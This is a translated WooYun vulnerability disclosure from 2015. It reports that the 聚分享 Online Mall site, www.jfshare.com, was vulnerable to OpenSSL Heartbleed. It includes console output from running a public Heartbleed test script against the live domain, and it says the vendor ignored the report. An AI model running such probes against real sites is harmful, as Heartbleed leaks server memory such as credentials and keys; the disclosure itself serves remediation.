
Vulnerability summary

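Bug ID: wooyun-2015-0120467

Title: 聚分享 Online Mall main site OpenSSL Heartbleed

Vendor: 聚分享 Online Mall

Reported by: 0c0c0f

Submitted: 2015-06-18 11:51

Fix time: 2015-08-02 11:52

Disclosed: 2015-08-02 11:52

Vulnerability type: Improper system/service operations configuration

Severity: High

Self-assessed rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]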


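Vulnerability details

Disclosure status:

2015-06-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-08-02: The vendor actively ignored the vulnerability; details released to the public

Brief description:

聚分享 Online Mall is a new type of integrated e-commerce platform that supports flexible mixed payment methods such as points redemption, points plus cash, e-voucher/QR-code payment, phone-bill payment, Tenpay, Alipay, UnionPay Online, and more...

Detailed description: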

[root@iZ94rdoov1yZ exp]# python ssltest.py www.jfshare.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 2509
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:

Proof of impact:

openssl.png


openssl1.png


openssl3.png


Proof of vulnerability:

openssl.png


openssl1.png


openssl3.png


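Remediation:

Upgrade OpenSSL

Copyright notice: when reposting, please credit the source 0c0c0f@WooYun


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused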